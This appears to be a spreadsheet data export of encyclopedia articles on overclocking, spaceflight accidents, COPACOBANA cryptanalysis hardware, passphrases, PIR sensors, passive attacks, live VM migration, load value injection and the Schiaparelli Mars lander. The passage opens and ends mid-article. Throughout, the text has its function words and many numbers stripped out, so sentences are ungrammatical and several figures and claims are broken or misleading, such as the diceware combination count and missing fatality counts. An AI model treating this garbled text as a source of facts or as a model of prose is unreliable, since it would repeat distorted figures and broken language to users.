rating behave ways higher-rated ones, worst case operation higher rating problematical. notably, higher clocks must always mean greater waste heat generation, semiconductors high must dump ground often. cases, means chief drawback overclocked part heat dissipated maximums published manufacturer. pentium architect colwell calls overclocking "uncontrolled experiment better-than-worst-case system operation". measuring effects overclocking benchmarks used evaluate performance, become kind "sport" users compete highest scores. discussed above, stability functional correctness compromised overclocking, meaningful benchmark results depend correct execution benchmark. because this, benchmark scores qualified stability correctness notes (e.g. overclocker report score, noting benchmark runs completion times, signs incorrect execution display corruption visible running benchmark). widely used test stability prime95, built-in error checking fails computer unstable. using benchmark scores, difficult judge difference overclocking makes overall performance computer. example, benchmarks test aspect system, memory bandwidth, without taking consideration higher clock rates aspect improve system performance whole. apart demanding applications video encoding, high-demand databases scientific computing, memory bandwidth typically bottleneck, great increase memory bandwidth unnoticeable user depending applications used. other benchmarks, 3dmark, attempt replicate game conditions. manufacturer vendor overclocking commercial system builders component resellers sometimes overclock sell items higher profit margins. seller makes money overclocking lower-priced components found operate correctly selling equipment prices appropriate higher-rated components. while equipment normally operate correctly, practice considered fraudulent buyer unaware overclocking sometimes offered legitimate service feature consumers, manufacturer retailer tests overclocking capability processors, memory, video cards, hardware products. several video card manufactures offer factory-overclocked versions graphics accelerators, complete warranty, usually price intermediate standard product non-overclocked product higher performance. speculated manufacturers implement overclocking prevention mechanisms multiplier locking prevent users buying lower-priced items overclocking them. these measures sometimes marketed consumer protection benefit, often criticized buyers. many motherboards sold, advertised, extensive facilities overclocking implemented hardware controlled bios settings. multiplier locking multiplier locking process permanently setting cpu's clock multiplier. cpus unlocked early editions model locked later editions, nearly intel cpus locked recent models resistant unlocking prevent overclocking users. ships unlocked cpus opteron, ryzen black series line-up, intel uses monikers "extreme edition" "k-series." intel usually extreme edition cpus market well series series cpus analogous amd's black edition. majority desktop range black edition. users usually unlock cpus allow overclocking, sometimes allow underclocking order maintain front side speed older cpus) compatibility certain motherboards. unlocking generally invalidates manufacturer's warranty, mistakes cripple destroy cpu. locking chip's clock multiplier necessarily prevent users overclocking, speed front-side multiplier newer cpus) still changed provide performance increase. athlon athlon cpus generally unlocked connecting bridges (jumper-like points) conductive paint pencil lead. other models require different procedures. increasing front-side northbridge/pci clocks overclock locked cpus, throws many system frequencies sync, since frequencies modified well. easiest ways unlock older athlon cpus called method, possible unlock without permanently modifying bridges. user could simply wire multiplier/vcore) socket unlock cpu. more recently however, notably intel's skylake architecture, intel skylake (6th core) processors base clock could increased past 102.7 mhz, however functionality certain features would work. intel intended block base clock (bclk) overclocking locked processors designing skylake architecture prevent consumers purchasing cheaper components overclocking previously-unseen heights (since cpu's bclk longer tied buses), however lga1151, generation "skylake" processors able overclocked past 102.7 (which intended limit intel, later mandated later bios updates). unlocked processors lga1151 (including 7th, 8th, generation) bga1440 allow bclk overclocking long allows it), locked processors 7th, 8th, able past 102.7 mhz. 10th however, could reach bclk. advantages higher performance games, en-/decoding, video editing system tasks additional direct monetary expense, increased electrical consumption thermal output. system optimization: some systems "bottlenecks", small overclocking component help realize full potential another component greater percentage limiting hardware overclocked. instance: many motherboards athlon processors limit clock rate four units mhz. however, memory performance computed dividing processor clock rate (which base number times multiplier, instance likely 9×200 mhz) fixed integer that, stock clock rate, would clock rate near mhz. manipulating elements processor clock rate (usually adjusting multiplier), often possible overclock processor small amount, around 5-10%, gain small increase clock rate and/or reduction latency timings. cheaper purchase lower performance component overclock clock rate expensive component. extending life older equipment (through underclocking/undervolting). disadvantages general higher clock rates voltages increase power consumption, also increasing electricity cost heat production. additional heat increases ambient temperature within system case, affect components. blown case heats room noise: high-performance fans running maximum speed used required degree cooling overclocked machine noisy, producing noise. when maximum cooling required, equipment, speeds reduced maximum: noise found roughly proportional fifth power speed; halving speed reduces noise noise reduced design improvements, e.g. aerodynamically optimized blades smoother airflow, reducing noise around approximately metre larger fans rotating slowly, produce less noise smaller, faster fans airflow. acoustical insulation inside case e.g. acoustic foam reduce noise. additional cooling methods fans used, liquid phase-change cooling. overclocked computer become unreliable. example: microsoft windows appear work problems, re-installed upgraded, error messages received "file copy error" windows setup. because installing windows memory-intensive, decoding errors occur files extracted windows cd-rom lifespan semiconductor components reduced increased voltages heat. warranties voided overclocking. risks overclocking increasing operation frequency component usually increase thermal output linear fashion, increase voltage usually causes thermal power increase quadratically. excessive voltages improper cooling cause chip temperatures rise dangerous levels, causing chip damaged destroyed. exotic cooling methods used facilitate overclocking water cooling likely cause damage malfunction. sub-ambient cooling methods phase-change cooling liquid nitrogen cause water condensation, cause electrical damage unless controlled; methods include using kneaded erasers shop towels catch condensation. limitations overclocking components noticeable benefit component critical path process, bottleneck. disk access speed internet connection limit speed process, increase processor speed unlikely noticed, however scenarios increasing clock speed processor actually allows read written faster. overclocking noticeably benefit game graphics card's performance "bottleneck" game. graphics cards graphics cards also overclocked. there utilities achieve this, evga's precision, rivatuner, overdrive cards only), afterburner, zotac firestorm, link mode asus motherboards. overclocking often yield marked increase performance synthetic benchmarks, usually reflected game performance. sometimes possible graphics card pushed beyond limits permanent damage done observing on-screen artifacts unexpected system crashes. common problems overclocking graphics cards; symptoms time usually means card severely pushed beyond heat, clock rate, and/or voltage limits, however seen overclocked, indicate faulty card. after reboot, video settings reset standard values stored graphics card firmware, maximum clock rate specific card deducted. some overclockers apply potentiometer graphics card manually adjust voltage (which usually invalidates warranty). this allows finer adjustments, overclocking software graphics cards far. excessive voltage increases damage destroy components graphics card entire graphics card (practically speaking). alternatives flashing unlocking used improve performance video card, without technically overclocking (but much riskier overclocking software). flashing refers using firmware different card sometimes similar) core compatible firmware, effectively making higher model card; difficult, irreversible. sometimes standalone software modify firmware files found, e.g. nibitor (geforce series well regarded aspect), without using firmware better model video card. example, video cards accelerators (most, 2011) voltage clock rate settings, designed operate three voltage stages, third somewhere aforementioned two, serving fallback card overheats middle-stage going operation mode. therefore, could wise middle-stage prior "serious" overclocking, specifically fallback ability; card drop clock rate, reducing sometimes dozen, depending setting) percent efficiency cool down, without dropping mode (and afterwards return desired high performance clock voltage settings). some cards abilities directly connected overclocking. example, nvidia's geforce 6600gt (agp flavor) temperature monitor used internally card, invisible user standard firmware used. modifying firmware display 'temperature' tab. unlocking refers enabling extra pipelines pixel shaders. 6800le, 6800gs 6800 (agp models only) first cards benefit unlocking. while models either pipes enabled, share 16x6 core 6800gt ultra, pipelines shaders beyond specified disabled; fully functional, found faults affect operation lower specification. gpus found fully functional unlocked successfully, although possible sure undiscovered faults; worst case card become permanently unusable. history overclocked processors first became commercially available 1983, sold overclocked version intel 8088 cpu. 1984, consumers overclocking ibm's version intel 80286 replacing clock crystal. xeon w-3175x xeon multiplier unlocked overclocking also references notescolwell, (march 2004). "the overclocking". computer. (3): 9–12. doi:10.1109/mc.2004.1273994. s2cid 21582410. external links overclocked inside overclock wikihow overclocking guide apple imac main logic board overclocking benchmark databases database hardware past decade (applications, modifications more) hwbot: worldwide overclocking league overclocking competition data comprehensive database segunda convencion nacional overclocking extremo imperio gamer tool overclock</t>
  </si>
  <si>
    <t>List of spaceflight-related accidents and incidents</t>
  </si>
  <si>
    <t>this article lists verifiable spaceflight-related accidents incidents resulting human fatality near-fatality flight training crewed space missions, testing, assembly, preparation flight crewed robotic spacecraft. included accidents incidents associated intercontinental ballistic missile (icbm) tests, fatality injury test animals, uncrewed space flights resulting human fatality serious injury, soviet german rocket-powered aircraft projects world also included alleged unreported soviet space accidents, considered fringe theories majority historians.as 2020, astronaut cosmonaut fatalities spaceflight. astronauts also died training space missions, apollo launch fire killed entire crew three. there also non-astronaut fatalities spaceflight-related activities. 2021, fatalities incidents regarding spaceflight. astronaut fatalities during spaceflight march 2021, in-flight accidents killed astronauts cosmonauts, five separate incidents. three flown kármán line (edge space), intended case, entire crew killed. current statistical fatality rate percent. nasa astronauts died duty memorialized space mirror memorial kennedy space center visitor complex merritt island, florida. cosmonauts died duty soviet union generally honored burial kremlin wall necropolis moscow. soviet russian cosmonauts died spaceflight since 1971. during training testing addition accidents spaceflights, astronauts, test pilots, personnel killed training tests. non-fatal incidents spaceflight apart actual disasters, number missions resulted near misses also training accidents nearly resulted deaths. non-fatal training accidents spaceflight-related accidents incidents assembly, testing, preparation flight crewed uncrewed spacecraft occasionally resulted injuries loss craft since earliest days space programs. non-astronaut fatalities fatalities caused rocket explosions this list excludes deaths caused military operations, either deliberate detonations, accidental production example german rockets reportedly caused average estimated deaths operational rocket production stages. other non-astronaut fatalities also spaceflight non-fatal training accidents criticism space shuttle program fallen astronaut international association advancement space safety lost cosmonauts skylab space exposure space shuttle international space station maintenance space station notes references external links encyclopedia astronautica manned space programs accident/incident summaries (1963 1969) nasa report (pdf format) crash site x-15a-3 manned space programs accident/incident summaries (1970 1971) nasa report (pdf format) interactive space shuttle disaster memorial video reconstruction space shuttle columbia re-entry more significant incidents close calls human spaceflight</t>
  </si>
  <si>
    <t>SciEngines GmbH</t>
  </si>
  <si>
    <t>sciengines gmbh privately owned company founded 2007 spin-off copacobana project universities bochum kiel, germany. project intended create platform affordable custom hardware attack. copacobana massively-parallel reconfigurable computer. utilized perform so-called brute force attack recover encrypted data. consists commercially available, reconfigurable integrated circuits (fpgas). these xilinx spartan3-1000 parallel, create massively parallel system. since 2007, sciengines gmbh enhanced developed successors copacobana. furthermore, copacobana become well known reference platform cryptanalysis custom hardware based attacks symmetric, asymmetric cyphers stream ciphers. 2008 attacks a5/1 stream cipher encryption system used encrypt voice streams published first known real world attack utilizing off-the-shelf custom hardware.they introduced 2008 rivyera s3-5000 enhancing performance computer dramatically using spartan-3 5000's. currently sciengines rivyera holds record brute-force breaking utilizing spartan-3 5000 fpgas. current systems provide unique density spartan-6 fpgas single system enabling scientific utilization beyond field cryptanalysis, like bioinformatics. 2006 original developers copacobana form company 2007 introduction copacobana (copacobana s3-1000) [cots] 2007 first demonstration copacobana 5000 2008 introduced rivyera s3-5000, direct successor copacobana 5000 copacobana. rivyera architecture introduced high performance optimized system fully encapsulated communication framework. 2008 demonstration copacobana v4-sx35, virtex-4 sx35 fpga cluster (copacobana shared architecture) 2008 introduction rivyera v4-sx35, virtex-4 sx35 fpga cluster (rivyera architecture) 2009 introduced rivyera s6-lx150. 2011 introduced user usable fpgas rivyera s6-lx150 computer. providing standard off-the-shelf intel mainboard integrated fpga computer rivyera systems allow execute standard code without modifications. sciengines aims programmers focus porting time-consuming code fpga. therefore, bundle eclipse like development environment allows code implementation hardware based implementation languages e.g. vhdl, verilog well based languages. application programming interface c++, java fortran allow scientists programmers adopt code benefit application-specific hardware architecture. references sciengines collaborate 188x acceleration blast www.sciengines.com (official site) www.copacobana.org further reading lars wienbrandt, bioinformatics applications fpga-based high-performance computer rivyera, "high performance computing using fpgas" edited vanderbauwhede, khaled benkrid, springer, 2013, isbn 978-1-4614-1790-3. güneysu, timo kasper, martin novotný, christof paar, lars wienbrandt, ralf zimmermann, high-performance cryptanalysis rivyera copacobana computing systems, "high performance computing using fpgas" edited vanderbauwhede, khaled benkrid, springer, 2013, isbn 978-1-4614-1790-3. ayman abbas, claas anders rathje, lars wienbrandt, manfred schimmler, dictionary attack truecrypt rivyera s3-5000, 2012 ieee 18th international conference parallel distributed systems (icpads), 2012, 93–100. florian schatz, lars wienbrandt, manfred schimmler, probability model boundaries short-read sequencing, 2012 international conference advances computing communications (icacc), 2012, 223–228. (best paper award) christoph starke, vasco grossmann, lars wienbrandt, manfred schimmler, fpga implementation investment strategy processor, procedia computer science, vol. 2012, 1880–1889. lars wienbrandt, daniel siebert, manfred schimmler, improvement blastp fpga-based high-performance computer rivyera, lecture notes computer science, vol. 7292, 2012, 275–286. christoph starke, vasco grossmann, lars wienbrandt, sven koschnicke, john carstens, manfred schimmler, optimizing investment strategies reconfigurable hardware platform rivyera, international journal reconfigurable computing, vol. 2012, pages. lars wienbrandt, stefan baumgart, jost bissel, florian schatz, manfred schimmler, massively parallel fpga-based implementation blastp two-hit method, procedia computer science, vol. 2011, 1967–1976. lars wienbrandt, hardware implementation massive parallelization blast, invited talk: workshop theoretical biology, max-planck-institute evolutionary biology, plön 2011. lars wienbrandt, manfred schimmler, collecting statistical information sequences detection special motifs, proceedings biocomp2010, 2010, 274–278. manfred schimmler, lars wienbrandt, güneysu, jost bissel, copacobana: massively parallel fpga-based computer architecture, "bioinformatics: high performance parallel computer architectures" edited bertil schmidt, press, 2010, isbn 978-1-4398-1488-8. lars wienbrandt, stefan baumgart, jost bissel, carol yeo, manfred schimmler, using reconfigurable massively parallel architecture copacobana 5000 applications bioinformatics, procedia computer science, vol. (1), 2010, 1027–1034. lars wienbrandt, massiv parallelisierte dna-motivsuche copacobana hardware-implementierung vhdl effizienzvergleich einem standard-pc, diplomarbeit, dezember 2008 schröder, lars wienbrandt, gerd pfeiffer, manfred schimmler, massively parallelized motif search reconfigurable hardware platform copacobana, proceedings third iapr international conference pattern recognition bioinformatics (prib2008), 2008, 436–447. baumgart, copacobana rivyera feasible custom hardware attacks, oder angriff moderne verschlüsselungsverfahren mittels roher gewalt, esproject conference (23. 24.11.2010 berlin) baumgart, emerging architectures massively reconfigurable computing plattforms applications, jcra 2010 reconfigurable computing applications conference, (8th-10th sep. valencia, spain) pfeiffer, baumgart, schröder, schimmler, massively parallel architecture bioinformatics, iccs 2009 international conference computational science (9th international conference baton rouge, usa, 25–27, 2009)[1] baumgart, using emerging parallel architectures computational science, iccs 2009 international conference computational science (9th international conference baton rouge, usa, 25–27, 2009)[2]</t>
  </si>
  <si>
    <t>Passphrase</t>
  </si>
  <si>
    <t>passphrase sequence words text used control access computer system, program data. similar password usage, passphrase generally longer added security. passphrases often used control access operation cryptographic programs systems, especially derive encryption passphrase. origin term analogy password. modern concept passphrases believed invented sigmund porter 1982. security considering entropy written english less bits character, passphrases relatively weak. nist estimated 23-character passphrase "iamthecapitanofthepina4" contains 45-bit strength. equation employed bits (1st character) bits (characters 2–8) bits (characters 9–20) bits (characters 21–23) bits (bonus upper case, lower case, alphanumeric) bits(this calculation take account well-known quote operetta h.m.s. pinafore. hash passphrase cracked seconds using crackstation.net, indicating phrase found password cracking databases.) using guideline, achieve 80-bit strength recommended high security (non-military) nist, passphrase would need characters long, assuming composition includes uppercase alphanumeric. there room debate regarding applicability equation, depending number bits entropy assigned. example, characters five-letter words contain bits entropy, would mean 35-character passphrase necessary achieve strength.if words components passphrase found language dictionary—especially available electronic input software program—the passphrase rendered vulnerable dictionary attack. this particular issue entire phrase found book quotations phrase compilations. however, required effort time cost) made impracticably high enough words passphrase randomly chosen ordered passphrase. number combinations would tested sufficient conditions make dictionary attack difficult infeasible. these difficult conditions meet, selecting least word cannot found dictionary significantly increases passphrase strength. passphrases chosen humans, usually biased frequency particular words natural language. case four word phrases, actual entropy rarely exceeds bits. hand, user-selected passwords tend much weaker that, encouraging users even 2-word passphrases able raise entropy bits bits.for example, widely used cryptography standard openpgp requires user make passphrase must entered whenever decrypting signing messages. internet services like hushmail provide free encrypted e-mail file sharing services, security present depends almost entirely quality chosen passphrase. compared passwords passphrases differ passwords. password usually short—six characters. such passwords adequate various applications frequently changed, chosen using appropriate policy, found dictionaries, sufficiently random, and/or system prevents online guessing, etc.) logging onto computer systems negotiating keys interactive setting (e.g. using password-authenticated agreement) enabling smart-card card (e.g. password data (hopefully) cannot extracted)but passwords typically safe keys standalone security systems (e.g., encryption systems) expose data enable offline password guessing attacker. passphrases theoretically stronger, make better choice cases. first, usually (and always much longer—20 characters typical—making kinds brute force attacks entirely impractical. second, well chosen, found phrase quote dictionary, dictionary attacks almost impossible. third, structured easily memorable passwords without written down, reducing risk hardcopy theft. however, passphrase protected appropriately authenticator clear-text passphrase revealed better passwords. reason recommended passphrases reused across different unique sites services. 2012, cambridge university researchers analyzed passphrases amazon payphrase system found significant percentage easy guess common cultural references movie names sports teams, losing much potential using long passwords.when used cryptography, commonly passphrase protects long (machine generated) key, protects data. long brute force attack (directly data) impossible. derivation function used, involving many thousands iterations (salted hashed), slow password cracking attacks. passphrases selection typical advice choosing passphrase includes suggestions long enough hard guess famous quotation literature, holy books, cetera hard guess intuition—even someone knows user well easy remember type accurately better security, easily memorable encoding user's level applied. reused sites, applications different sources example methods method create strong passphrase dice select words random long list, technique often referred diceware. while collection words might appear violate "not dictionary" rule, security based entirely large number possible ways choose list words secrecy words themselves. example, 7776 words list words chosen randomly, 7,7766 221,073,919,720,733,357,899,776 combinations, providing bits entropy. (the number 7776 chosen allow words selected throwing five dice. 7776 random word sequences memorized using techniques memory palace. another choose phrases, turn acronym, include second, making final passphrase. instance, using english language typing exercises, following. quick brown jumps lazy dog, becomes tqbfjotld. including time good come country, might produce, time good tqbfjotld come country passphrase. there several points note here, relating example passphrase good one. appeared public avoided everyone. long (which considerable virtue theory) requires good typist typing errors much likely extended phrases. individuals organizations serious cracking computer security compiled lists passwords derived manner common quotations, song lyrics, on.the passphrase suggests procedure attempts better balance theoretical security practicality example. procedures picking passphrase involve tradeoff security ease use; security least "adequate" "too seriously" annoying users. both criteria evaluated match particular situations. another supplementary approach frustrating brute-force attacks derive passphrase using deliberately slow hash function, pbkdf2 described 2898. windows support backward compatibility microsoft manager needed, versions windows (including windows 2000, windows later), passphrase used substitute windows password. passphrase longer characters, also avoid generation weak hash. unix support recent versions unix-like operating systems linux, openbsd, netbsd, solaris freebsd, 255-character passphrases used. also keyfile password-based cryptography password psychology references external links diceware page xkcd password strength common-viewed explanation concept</t>
  </si>
  <si>
    <t>Passive infrared sensor</t>
  </si>
  <si>
    <t>passive infrared sensor (pir sensor) electronic sensor measures infrared (ir) light radiating objects field view. they often used pir-based motion detectors. sensors commonly used security alarms automatic lighting applications. sensors detect general movement, give information moved. purpose, imaging sensor required. sensors commonly called simply "pir", sometimes "pid", "passive infrared detector". term passive refers fact devices radiate energy detection purposes. they work entirely detecting infrared radiation (radiant heat) emitted reflected objects. operating principles objects temperature absolute zero emit heat energy form electromagnetic radiation. usually radiation visible human radiates infrared wavelengths, detected electronic devices designed purpose. pir-based motion detector pir-based motion detector used sense movement people, animals, objects. they commonly used burglar alarms automatically activated lighting systems. operation sensor detect changes amount infrared radiation impinging upon varies depending temperature surface characteristics objects front sensor. when object, person, passes front background, wall, temperature point sensor's field view rise room temperature body temperature, back again. sensor converts resulting change incoming infrared radiation change output voltage, triggers detection. objects similar temperature different surface characteristics also different infrared emission pattern, thus moving respect background trigger detector well.pirs come many configurations wide variety applications. common models numerous fresnel lenses mirror segments, effective range meters feet), field view less 180°. models wider fields view, including 360°, available, typically designed mount ceiling. some larger pirs made single segment mirrors sense changes infrared energy meters (100 feet) pir. there also pirs designed reversible orientation mirrors allow either broad coverage (110° wide) narrow "curtain" coverage, individually selectable segments "shape" coverage. differential detection pairs sensor elements wired opposite inputs differential amplifier. configuration, measurements cancel average temperature field view removed electrical signal; increase energy across entire sensor self-cancelling trigger device. this allows device resist false indications change event exposed brief flashes light field-wide illumination. (continuous high energy exposure still able saturate sensor materials render sensor unable register information.) time, differential arrangement minimizes common-mode interference, allowing device resist triggering nearby electric fields. however, differential pair sensors cannot measure temperature configuration, therefore useful motion detection. practical implementation when sensor configured differential mode, specifically becomes applicable motion detector device. mode, movement detected within "line sight" sensor, pair complementary pulses processed output sensor. order implement output signal practical triggering load relay data logger, alarm device alarm, differential signal rectified using bridge rectifier transistorized relay driver circuit. contacts relay close open response signals pir, activating attached load across contacts, acknowledging detection person within predetermined restricted area. product design sensor typically mounted printed circuit board containing necessary electronics required interpret signals sensor itself. complete assembly usually contained within housing, mounted location sensor cover area monitored. housing usually plastic "window" infrared energy enter. despite often translucent visible light, infrared energy able reach sensor window plastic used transparent infrared radiation. plastic window reduces chance foreign objects (dust, insects, rain, etc.) obscuring sensor's field view, damaging mechanism, and/or causing false alarms. window used filter, limit wavelengths 8-14 micrometres, closest infrared radiation emitted humans. also serve focusing mechanism; below. focusing different mechanisms used focus distant infrared energy onto sensor surface. lenses plastic window covering multiple facets molded focus infrared energy onto sensor. each individual facet fresnel lens. multi-fresnel lens type mirrors some pirs manufactured internal, segmented parabolic mirrors focus infrared energy. where mirrors used, plastic window cover generally fresnel lenses molded segmented mirror type beam pattern result focussing, detector view actually beam pattern. under certain angles (zones), sensor receives almost radiation energy angles receives concentrated amounts infrared energy. this separation helps motion detector discriminate field-wide illumination moving objects. when person walks angle (beam) another, detector intermittently moving person. this results rapidly changing sensor signal used electronics trigger alarm turn lighting. slowly changing signal ignored electronics. number, shape, distribution sensitivity zones determined lens and/or mirror. manufacturers best create optimal sensitivity beam pattern application. automatic lighting applications when used part lighting system, electronics typically control integral relay capable switching mains voltage. this means turn lights connected movement detected. this commonly used outdoor scenarios either deter criminals (security lighting) practical uses like front door light turning find keys dark. additional uses public toilets, walk-in pantries, hallways anywhere automatic control lights useful. this provide energy savings lights turned needed reliance users remembering turn lights leave area. security applications when used part security system, electronics typically control small relay. this relay completes circuit across pair electrical contacts connected detection input zone burglar alarm control panel. system usually designed motion detected, relay contact closed—a 'normally closed' (nc) relay. motion detected, relay open circuit, triggering alarm; wire disconnected, alarm also operate. placement manufacturers recommend careful placement products prevent false alarms (i.e., detection caused intruder). they suggest mounting pirs cannot "see" window. although wavelength infrared radiation chips sensitive penetrate glass well, strong infrared source (such vehicle headlight sunlight) overload sensor cause false alarm. person moving side glass would "seen" pid. that good window facing public sidewalk, window interior partition. also recommended placed position hvac vent would blow cold onto surface plastic covers housing's window. although emissivity (emits small amounts infrared energy), blowing plastic window cover could change plastic's temperature enough trigger false alarm. sensors also often designed "ignore" domestic pets, dogs cats, setting higher sensitivity threshold, ensuring floor room remains focus. since sensors ranges meters feet), single detector placed near entrance typically necessary rooms single entrance. pir-based security systems also viable outdoor security motion-sensitive lighting; advantage power draw, allows solar-powered. remote-based thermometer designs implemented circuit measures temperature remote object. circuit, non-differential output used. output signal evaluated according calibration spectrum specific type matter observed. means, relatively accurate precise temperature measurements obtained remotely. without calibration type material observed, thermometer device able measure changes emission correspond directly temperature changes, actual temperature values cannot calculated. also heat detector infrared point sensor infrared sensor list sensors notes external links infrared motion detector components work design advice assembly instructions motion detector u.s. patent 3,703,718, infrared intrusion detector system, issued 1972 herbert berman, contains clear explanation</t>
  </si>
  <si>
    <t>Passive attack</t>
  </si>
  <si>
    <t>passive attack cryptosystem cryptanalyst cannot interact parties involved, attempting break system solely based upon observed data (i.e. ciphertext). this also include known plaintext attacks plaintext corresponding ciphertext known. while active attackers interact parties sending data, passive attacker limited intercepting communications (eavesdropping), seeks decrypt data interpreting transcripts authentication sessions. since passive attackers introduce data own, difficult detect.while classical ciphers vulnerable form attack, modern ciphers designed prevent type attack others. attributes traffic analysis non-evasive eavesdropping monitoring transmissions because data unaffected, tricky detect emphasis prevention (encryption) detection sometimes referred "tapping"the main types passive attacks traffic analysis release message contents. during traffic analysis attack, eavesdropper analyzes traffic, determines location, identifies communicating hosts observes frequency length exchanged messages. uses information predict nature communication. incoming outgoing traffic network analyzed, altered. release message content, telephonic conversation, e-mail message transferred file contain confidential data. passive attack monitors contents transmitted data. passive attacks difficult detect involve alteration data. when messages exchanged neither sender receiver aware third party capture messages. this prevented encryption data. also known plaintext attack chosen plaintext attack chosen ciphertext attack adaptive chosen ciphertext attack topics cryptography references further reading cryptography network security william stallings</t>
  </si>
  <si>
    <t>Live Partition Mobility</t>
  </si>
  <si>
    <t>live partition mobility chargeable live migration feature power6, power7, power8 power9 servers, available since 2007, allows running lpar relocated system another. concept, similar vmware vmotion. live partition mobility, component powervm enterprise edition hardware feature, provides ability move aix, linux logical partitions system another. mobility process transfers system environment includes processor state, memory, attached virtual devices, connected users. source target systems must access network sans need type, requirement power6, power7, power8 processors. partitions relocated must fully virtualized (i.e. dedicated adapters) although possible multi-pathing software fail virtual adapters duration move. sized partition moved; essentially, memory copied asynchronously system another create clone running partition, "dirty" pages re-copied necessary. when threshold reached (i.e. high percentage pages successfully copied across), partition transitioned target machine remaining pages copied across synchronously. agents carry memory copying nominated virtual servers machine; standard ethernet network used data transmission. live partition mobility used avoid outages planned server maintenance, load balancing across multiple servers energy conservation. recommended reading power6 partition mobility: moving virtual servers seamlessly physical systems, ibm, 2007 powervm live partition mobility system ibm, 2007 (ibm link dead. article tagged obsolete) live partition mobility</t>
  </si>
  <si>
    <t>Live migration</t>
  </si>
  <si>
    <t>live migration refers process moving running virtual machine application different physical machines without disconnecting client application. memory, storage, network connectivity virtual machine transferred original guest machine destination. memory migration techniques moving virtual machine's memory state source destination pre-copy memory migration post-copy memory migration. pre-copy memory migration warm-up phase pre-copy memory migration, hypervisor typically copies memory pages source destination still running source. memory pages change (become 'dirty') process, re-copied rate re-copied pages greater page dirtying rate. stop-and-copy phase after warm-up phase, stopped original host, remaining dirty pages copied destination, resumed destination host. time stopping original host resuming destination called "down-time", ranges milliseconds seconds according size memory applications running there techniques reduce live migration down-time, using probability density function memory change. post-copy memory migration post-copy migration initiated suspending source. with suspended, minimal subset execution state (cpu state, registers and, optionally, non-pageable memory) transferred target. resumed target. concurrently, source actively pushes remaining memory pages target activity known pre-paging. target, tries access page transferred, generates page-fault. these faults, known network faults, trapped target redirected source, responds faulted page. many network faults degrade performance applications running inside hence pre-paging dynamically adapt page transmission order network faults actively pushing pages vicinity last fault. ideal pre-paging scheme would mask large majority network faults, although performance depends upon memory access pattern vm's workload. post-copy sends page exactly network. contrast, pre-copy transfer page multiple times page dirtied repeatedly source migration. hand, pre-copy retains up-to-date state source migration, whereas post-copy, vm's state distributed source destination. destination fails migration, pre-copy recover whereas post-copy cannot. seamless live migration when down-time live migration noticeable user, called seamless live migration. seamless live migration dependent dynamic interface framework, subjecting process delayed sequence encryption protocols. managers live migration support virtuozzo since version 2.0, 2004 guests; since version 3.1, 2007 guests openvz parallels cloud server workload partitions integrity virtual machines since february 2007, different techniques. oracle server oracle server sparc ovirt virtualisation power hypervisor (phyp) vmware esxi live partition mobility, since 2007 hyper-v server 2008 virtualbox proxmox virtual environment cloud platforms live migration support jelastic google cloud platform cloudendure systems providing software live migration openssi mosix single-system image also virtual machine self-migration comparison platform virtualization software criu references external links howto article migration openvz checkpointing live migration live migration vmware vmotion microsoft: step step guide live migration microsoft whitepaper: live migration overview architecture</t>
  </si>
  <si>
    <t>Lmctfy</t>
  </si>
  <si>
    <t>lmctfy ("let contain that you", pronounced "l-m-c-t-fi") implementation operating system–level virtualization, based linux kernel's cgroups functionality. provides similar functionality container-related linux tools docker lxc. lmctfy release google's container tools free open-source software subject terms apache license version 2.0. maintainers 2015 stated effort merge concepts abstractions docker's underlying library libcontainer thus stopped active development lmctfy. references external links presentation slides initial release announcement project website project "readme" file providing overview google groups post providing depth comparison tools</t>
  </si>
  <si>
    <t>Load value injection</t>
  </si>
  <si>
    <t>load value injection (lvi) attack intel microprocessors used attack intel's software guard extensions (sgx) technology. development previously known meltdown security vulnerability. unlike meltdown, read hidden data, inject data values, resistant countermeasures used mitigate meltdown vulnerability.in theory, processor affected meltdown vulnerable lvi, march 2020, known affect intel microprocessors. intel published guide mitigating vulnerability using compiler technology, requiring existing software recompiled lfence memory barrier instructions every potentially vulnerable point code. however, mitigation appears likely result substantial performance reductions recompiled code. also transient execution vulnerabilities references external links official website intel's analysis vulnerability</t>
  </si>
  <si>
    <t>Schiaparelli EDM</t>
  </si>
  <si>
    <t>schiaparelli (italian: [skjapaˈrɛlli]) failed entry, descent, landing demonstrator module (edm) exomars programme—a joint mission european space agency (esa) russian space agency roscosmos. built italy intended test technology future soft landings surface mars. also limited focused science payload would measured atmospheric electricity mars local meteorological conditions.launched together exomars trace orbiter (tgo) march 2016, schiaparelli attempted landing october 2016. telemetry signals schiaparelli, monitored real time giant metrewave radio telescope india (and confirmed mars express), lost minute surface final landing stages. october 2016, nasa released image mars reconnaissance orbiter showing appears lander's crash site. telemetry data accumulated relayed esa's exomars trace orbiter mars express used investigate failure modes landing technology employed. namesake schiaparelli entry, descent, landing demonstrator module named giovanni schiaparelli (1835–1910), astronomer active 19th century made mars observations. particular, recorded features called canali native italian. observations translates channels english inspired many. dark streaks mars albedo feature related dust distribution; albedo features mars slowly change time, last decades monitored mars orbiters. schiaparelli famous making hand-drawn maps mars 1877 oppositions earth optical refracting telescope. also first astronomer determine relationship comet debris yearly meteor showers.other things named schiaparelli include main-belt asteroid 4062 schiaparelli, named september 1989 (m.p.c. 15090), lunar crater schiaparelli, martian crater schiaparelli, schiaparelli dorsum mercury, 2016 exomars lander.the mission named november 2013; previously known exomars entry, descent landing demonstrator module, exomars short. another name exomars static lander, however designs static lander quite different various stages design program restructuring. another name, especially orbiter lander together exomars 2016. origins development traces back aurora programme, goal human exploration space, thus producing missions building blocks support goal. exomars originated this, provides context understanding edm. schiaparelli forms important "block" learning land heavy payloads mars, vital future crewed missions. another "block" exomars rover, intended demonstrate among things ability traverse several km/miles surface mars. aurora program focused types mission, larger flagship spacecraft smaller missions specifically meant offload risk larger missions.in 2005 council approved million euros mars rover static lander. time idea single launch bringing mars exploration rover class rover instrumented static lander mars simpler cruise stage;in case static lander landed rover performed studies. however accomplish mission goals within constraints using soyuz rocket launch, rover budgeted enable larger rover, ariane atlas proton evaluated. rovers considered, eventually idea test lander offload risk rover lander arose, fitted well two-launch strategy allowing heavier orbiter heavier rover second launch.early development, lander carried dedicated cruise stage called carrier module. eventually, trace orbiter mission merged exomars, becoming carrier edm. overview although lander crashed, data transmitted schiaparelli expected provide roscosmos technology landing surface mars controlled soft landing. this technology used rosalind franklin rover, part exomars programme, launch 2022. pre-launch (1,272 descent module schiaparelli orbiter completed testing integrated proton-m rocket baikonur cosmodrome baikonur mid-january 2016. arrived baikonur december 2015. february spacecraft mounted briz-m upper stage, early march attached proton rocket. liftoff launch occurred 09:31 (15:31 local time) march 2016. four rocket burns occurred following hours descent module orbiter released. signal orbiter received 21:29 day, confirming 